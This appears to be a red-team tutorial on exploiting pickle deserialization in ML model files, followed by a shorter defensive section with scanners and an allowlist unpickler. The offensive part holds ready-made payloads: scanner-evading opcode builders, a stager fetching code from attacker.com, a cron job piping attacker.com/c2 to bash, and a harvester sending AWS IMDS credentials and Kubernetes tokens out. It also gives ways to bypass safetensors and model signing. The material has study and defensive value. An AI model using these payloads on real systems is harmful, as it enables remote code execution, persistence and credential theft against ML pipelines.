Pickle Deserialization Exploits
Technical methodology for crafting pickle payloads, bypassing safetensors and model signing, and exploiting ML model deserialization across frameworks.
Pickle Deserialization Exploits
Pickle deserialization is the most reliable RCE vector in the ML ecosystem. Unlike traditional deserialization bugs requiring gadget chains, pickle exploitation is straightforward by design: the __reduce__ protocol allows arbitrary reconstruction logic, and the ML ecosystem has normalized loading untrusted pickle files as standard practice.
Pickle VM Internals
Key Opcodes for Exploitation
| Opcode | Name | Function | Use in Exploits |
|---|---|---|---|
R | REDUCE | Pop callable + args tuple, call callable(*args) | Primary RCE primitive |
c | GLOBAL | Push module.name onto stack | Reference os.system, exec, etc. |
i | INST | Create instance via cls(*args) | Alternative to REDUCE |
b | BUILD | Call obj.__setstate__(state) | Complex object reconstruction |
\x93 | STACK_GLOBAL | Like GLOBAL but reads from stack | Dynamic callable resolution (evasion) |
Use pickletools.dis(data) to disassemble any pickle and inspect its opcodes.
import pickle, pickletools
class SimplePayload:
def __reduce__(self):
return (eval, ("print('RCE')",))
pickletools.dis(pickle.dumps(SimplePayload()))
# Shows STACK_GLOBAL -> REDUCE chain calling eval()Payload Construction Methodology
Choose the execution primitive
Use
__reduce__for Python-level payloads, or raw bytecode for evasion.Primitive Complexity Evasion Use When __reduce__+os.systemLow None Quick PoC, no scanner in place __reduce__+execLow None Multi-statement payloads Raw opcodes ( c,R)Medium Bypasses __reduce__inspectionTarget uses Python-level analysis STACK_GLOBAL opcodes High Bypasses static GLOBAL checks Target scans for known module names Build the payload
For basic payloads, use
__reduce__. For scanner evasion, craft raw bytecode.def craft_raw_pickle(command: str) -> bytes: """Raw opcode payload bypassing __reduce__ inspection.""" payload = b'\x80\x02' # Protocol 2 payload += b'cos\nsystem\n' # GLOBAL: os.system payload += b'(' + b'V' + command.encode() + b'\n' payload += b'tR.' # TUPLE + REDUCE + STOP return payloadAdd stealth: return valid model data
Wrap the payload so it executes silently and returns a legitimate-looking object (e.g., a
state_dict), preventing the victim from noticing anything wrong.Stage the delivery
For minimal pickle size, use a multi-stage approach: the pickle downloads and executes a second-stage script from an attacker-controlled server.
Advanced Payload Techniques
Chained Execution
Use exec() to run multi-statement payloads: reconnaissance, credential exfiltration, and persistence in a single deserialization.
class ChainedPayload:
def __reduce__(self):
return (exec, (
"import os,socket,json,urllib.request\n"
"recon={'host':socket.gethostname(),'user':os.getenv('USER')}\n"
"urllib.request.urlopen(urllib.request.Request("
"'https://attacker.com/beacon',json.dumps(recon).encode()))"
,))Multi-Stage Payloads
For maximum stealth and flexibility, use the initial pickle execution to download and run a second-stage payload. This keeps the pickle file small and allows the attacker to change the second stage without re-crafting the pickle.
class StagerPayload:
"""Minimal first-stage payload that downloads and executes a
second-stage script from an attacker-controlled server."""
def __reduce__(self):
return (exec, (
"import urllib.request,tempfile,os\n"
"stage2=urllib.request.urlopen('https://attacker.com/stage2.py').read()\n"
"f=tempfile.NamedTemporaryFile(suffix='.py',delete=False)\n"
"f.write(stage2);f.close()\n"
"exec(open(f.name).read())\n"
"os.unlink(f.name)"
,))
class PersistencePayload:
"""Install a cron job or systemd timer for persistent access."""
def __reduce__(self):
return (exec, (
"import os,subprocess\n"
"cron = '*/5 * * * * curl -s https://attacker.com/c2|bash'\n"
"subprocess.run(['bash','-c',"
"f'(crontab -l 2>/dev/null; echo \"{cron}\") | crontab -'],"
"capture_output=True)"
,))Polymorphic Payloads
Adapt behavior based on environment detection:
| Environment Check | Exploitation Path |
|---|---|
os.path.exists('/.dockerenv') | Container escape techniques |
'KUBERNETES_SERVICE_HOST' in os.environ | Read service account token, enumerate cluster |
'AWS_EXECUTION_ENV' in os.environ | Query IMDS for IAM credentials |
os.path.exists('/dev/nvidia0') | Scan GPU memory, enumerate model storage |
os.path.exists('/proc/self/cgroup') containing kubepods | Kubernetes pod, read mounted secrets |
'AZURE_CLIENT_ID' in os.environ | Azure managed identity, get ARM token |
requests.get('http://metadata.google.internal', timeout=1) succeeds | GCP instance, query metadata server |
class PolymorphicPayload:
"""Detects the runtime environment and executes the appropriate
credential harvesting technique."""
def __reduce__(self):
return (exec, (
"import os,json,urllib.request\n"
"env_info = {'platform': 'unknown'}\n"
"try:\n"
" if 'AWS_EXECUTION_ENV' in os.environ:\n"
" env_info['platform'] = 'aws'\n"
" r = urllib.request.urlopen(\n"
" 'http://169.254.169.254/latest/meta-data/iam/security-credentials/')\n"
" role = r.read().decode()\n"
" creds = json.loads(urllib.request.urlopen(\n"
" f'http://169.254.169.254/latest/meta-data/iam/security-credentials/{role}'\n"
" ).read())\n"
" env_info['creds'] = creds\n"
" elif os.path.exists('/var/run/secrets/kubernetes.io'):\n"
" env_info['platform'] = 'k8s'\n"
" with open('/var/run/secrets/kubernetes.io/serviceaccount/token') as f:\n"
" env_info['sa_token'] = f.read()\n"
"except: pass\n"
"urllib.request.urlopen(urllib.request.Request(\n"
" 'https://attacker.com/beacon',\n"
" json.dumps(env_info).encode(),\n"
" {'Content-Type':'application/json'}))"
,))Pickle Bomb (Resource Exhaustion)
Pickle bombs use nested tuple multiplication: a 100-byte pickle can expand to 10+ GB in memory. Each nesting level doubles the size (30 levels = ~1 billion references).
import pickle
def create_pickle_bomb(levels=25):
"""Create a pickle bomb that expands exponentially on deserialization.
WARNING: Only use in controlled environments with memory limits."""
# Start with a small byte string
payload = b'A' * 1024 # 1 KB
# Each level wraps in a tuple and multiplies
for _ in range(levels):
payload = pickle.dumps((payload,) * 2)
return payload
# A 25-level bomb: ~1 KB serialized, ~33 GB deserialized
# bomb = create_pickle_bomb(25)
# print(f"Serialized size: {len(bomb)} bytes")
# print(f"Estimated deserialized size: {2**25 / 1024:.0f} MB")STACK_GLOBAL Evasion Technique
Static scanners typically search for GLOBAL opcodes referencing known dangerous modules. The STACK_GLOBAL opcode (\x93) achieves the same effect but reads the module and attribute names from the stack instead of inline, making it harder for simple pattern-matching scanners to detect.
import struct
def craft_stack_global_payload(command: str) -> bytes:
"""Craft a payload using STACK_GLOBAL to evade scanners
that only check GLOBAL opcodes for dangerous module names."""
payload = b'\x80\x04' # Protocol 4
# Push module name onto stack via SHORT_BINUNICODE
module = b'os'
payload += b'\x8c' + bytes([len(module)]) + module
# Push attribute name onto stack
attr = b'system'
payload += b'\x8c' + bytes([len(attr)]) + attr
# STACK_GLOBAL reads module+attr from stack (not inline)
payload += b'\x93'
# Push the command argument
cmd = command.encode()
payload += b'\x8c' + bytes([len(cmd)]) + cmd
# TUPLE1 + REDUCE + STOP
payload += b'\x85R.'
return payload
# Scanner that only checks 'c' (GLOBAL) opcode will miss this
# payload = craft_stack_global_payload("id")Bypassing Safetensors
Safetensors is the recommended alternative to pickle, but the ecosystem transition is incomplete.
Bypass Vectors
Force pickle fallback
Remove safetensors files from a model repo. The
transformerslibrary checks formodel.safetensorsfirst, then falls back topytorch_model.bin(pickle). Upload a model with only.binfiles.Exploit custom code execution
Even with safetensors weights,
trust_remote_code=Trueexecutes arbitrary Python frommodeling_custom.py. The model card says "safetensors" but the repo contains executable code.model.safetensors # Safe weight storage config.json # Points to custom code modeling_custom.py # ARBITRARY CODE EXECUTIONTarget tokenizer code
tokenizer_config.jsoncan reference customtokenizer_custom.py. This is a lower-profile attack surface because scanners focus on model files.
Defeating Model Signing
Organizations implementing model signing commonly leave three exploitable gaps:
| Weakness | Attack | Why It Works |
|---|---|---|
| Partial scope | Modify config.json or modeling_custom.py while signed weights remain untouched | Signature only covers weight files, not the full model directory |
| TOCTOU | Modify cached model files between signature verification (at download) and loading (later) | TOCTOU gap between verification and use |
| Graceful fallback | Strip signature files; loader proceeds without enforcing verification | Loader does not reject unsigned models |
Proper signing requires: signing all files in the model directory, enforcing signature at load time (not just download), pinning expected signatures in application config, and rejecting unsigned models with no fallback.
Framework-Specific Attack Surface
| Framework | Serialization | Primary Risk | Mitigation | Mitigation Bypass |
|---|---|---|---|---|
| PyTorch | Pickle via torch.save | torch.load() = full pickle RCE | weights_only=True | Allowed globals may be chainable |
| scikit-learn | Pickle via joblib | joblib.load() = pickle RCE | Export to ONNX | Most tutorials use joblib |
| TensorFlow | Protobuf + custom ops | Custom ops execute at load time | Use standard ops only | Lambda layers contain arbitrary Python |
| Keras | HDF5 (.h5) | Lambda layers: lambda x: __import__('os').system('id') | Avoid Lambda layers | Legacy models often contain them |
Detection and Prevention
Static Pickle Scanning
Analyze pickle bytecode without deserializing. Flag GLOBAL, STACK_GLOBAL, and REDUCE opcodes that reference dangerous modules (os, subprocess, builtins, importlib, ctypes, socket).
import pickletools
def scan_pickle(data: bytes) -> dict:
"""Scan pickle bytecode for dangerous operations."""
DANGEROUS = {'os','subprocess','sys','eval','exec',
'builtins','importlib','ctypes','socket','urllib'}
threats = []
for opcode, arg, pos in pickletools.genops(data):
if opcode.name in ('GLOBAL','INST','STACK_GLOBAL'):
if arg and any(d in str(arg) for d in DANGEROUS):
threats.append({"opcode": opcode.name, "arg": str(arg), "pos": pos})
if opcode.name == 'REDUCE':
threats.append({"opcode": "REDUCE", "pos": pos})
return {"threats": threats, "verdict": "DANGEROUS" if threats else "LIKELY_SAFE"}Using Fickling for Deep Analysis
Fickling by Trail of Bits provides more sophisticated pickle analysis than simple opcode scanning. It can decompile pickle bytecode back to Python, detect control flow manipulation, and identify obfuscated payloads that evade simple scanners.
# pip install fickling
from fickling.fickle import Pickled
from fickling.analysis import check_safety
def deep_scan_pickle(filepath: str) -> dict:
"""Use Fickling for deep pickle analysis beyond opcode scanning."""
with open(filepath, 'rb') as f:
data = f.read()
result = {
"file": filepath,
"size": len(data),
"findings": []
}
# Check safety (Fickling's built-in analysis)
safety = check_safety(data)
result["fickling_verdict"] = str(safety)
# Decompile to see what the pickle actually does
pickled = Pickled.load(data)
for i, node in enumerate(pickled):
# Check for function calls
if hasattr(node, 'calls'):
for call in node.calls:
result["findings"].append({
"type": "function_call",
"node": i,
"call": str(call)
})
return resultRuntime Sandboxing
Override pickle.Unpickler.find_class with a strict allowlist of safe classes (e.g., collections.OrderedDict, torch.FloatStorage, numpy.ndarray). Reject everything else.
import pickle
import io
class SafeUnpickler(pickle.Unpickler):
"""Restrict pickle deserialization to only allowlisted classes.
This prevents arbitrary code execution by blocking GLOBAL and
STACK_GLOBAL references to dangerous modules."""
ALLOWED_CLASSES = {
('collections', 'OrderedDict'),
('numpy', 'ndarray'),
('numpy', 'dtype'),
('numpy.core.multiarray', '_reconstruct'),
('torch', 'FloatStorage'),
('torch', 'LongStorage'),
('torch', 'IntStorage'),
('torch', 'HalfStorage'),
('torch._utils', '_rebuild_tensor_v2'),
('_codecs', 'encode'),
}
def find_class(self, module: str, name: str) -> type:
if (module, name) not in self.ALLOWED_CLASSES:
raise pickle.UnpicklingError(
f"Blocked: {module}.{name} not in allowlist"
)
return super().find_class(module, name)
def safe_load(data: bytes):
"""Load pickle data with class restrictions."""
return SafeUnpickler(io.BytesIO(data)).load()
# Usage:
# model_weights = safe_load(pickle_data)
# Raises UnpicklingError if the pickle tries to call os.system, eval, etc.CI/CD Pipeline Integration
Integrate pickle scanning into your model deployment pipeline to catch malicious models before they reach production.
import pickletools
import sys
import glob
import json
from pathlib import Path
DANGEROUS_MODULES = {
'os', 'subprocess', 'sys', 'eval', 'exec', 'builtins',
'importlib', 'ctypes', 'socket', 'urllib', 'http',
'shutil', 'signal', 'code', 'codeop', 'compile',
'webbrowser', 'antigravity', 'turtle', 'tkinter'
}
def scan_model_directory(model_dir: str) -> dict:
"""Scan all pickle files in a model directory for threats."""
results = {"scanned": 0, "clean": 0, "dangerous": 0, "details": []}
pickle_extensions = ['*.pkl', '*.pickle', '*.pt', '*.pth', '*.bin',
'*.joblib', '*.npy', '*.npz']
for ext in pickle_extensions:
for filepath in glob.glob(f"{model_dir}/**/{ext}", recursive=True):
results["scanned"] += 1
try:
with open(filepath, 'rb') as f:
data = f.read()
threats = []
for opcode, arg, pos in pickletools.genops(data):
if opcode.name in ('GLOBAL', 'INST', 'STACK_GLOBAL'):
module = str(arg).split('.')[0] if arg else ''
if module in DANGEROUS_MODULES:
threats.append({
"opcode": opcode.name,
"ref": str(arg),
"position": pos
})
if threats:
results["dangerous"] += 1
results["details"].append({
"file": filepath,
"verdict": "DANGEROUS",
"threats": threats
})
else:
results["clean"] += 1
except Exception as e:
results["details"].append({
"file": filepath,
"verdict": "ERROR",
"error": str(e)
})
return results
if __name__ == '__main__':
model_dir = sys.argv[1] if len(sys.argv) > 1 else '.'
results = scan_model_directory(model_dir)
print(json.dumps(results, indent=2))
sys.exit(1 if results["dangerous"] > 0 else 0)torch.load with weights_only=True
PyTorch 2.0+ supports weights_only=True in torch.load(), which restricts deserialization to tensor data and a set of safe types. This is the simplest defense for PyTorch-specific workflows.
import torch
# Safe: only loads tensor data, blocks arbitrary code
model_state = torch.load('model.pt', weights_only=True)
# Unsafe: full pickle deserialization (legacy default)
# model_state = torch.load('model.pt') # DO NOT use with untrusted files
# Note: weights_only=True may fail for models that use custom classes
# in their state_dict. In that case, use map_location and allowlist:
model_state = torch.load(
'model.pt',
weights_only=True,
map_location='cpu'
)A model repository uses safetensors for weights and includes a config.json with auto_map pointing to a custom modeling_custom.py. What is the primary risk?
Related Topics
- AI Supply Chain Exploitation -- Broader supply chain attack surface beyond pickle
- Training & Fine-Tuning Attacks -- Backdoor injection that relies on model serialization
- AI Infrastructure Exploitation -- Container escape and GPU cluster attacks that pickle RCE enables
- Red Team Tooling -- Scanning and automation for detecting pickle vulnerabilities
References
- Fickling: Pickle decompiler and static analyzer — Trail of Bits pickle analysis tool
- Never a Dhat Moment: Detecting Deserialization Attacks — Serialization security research
- Safetensors: A Simple and Safe Way to Store and Distribute Tensors — The secure alternative to pickle serialization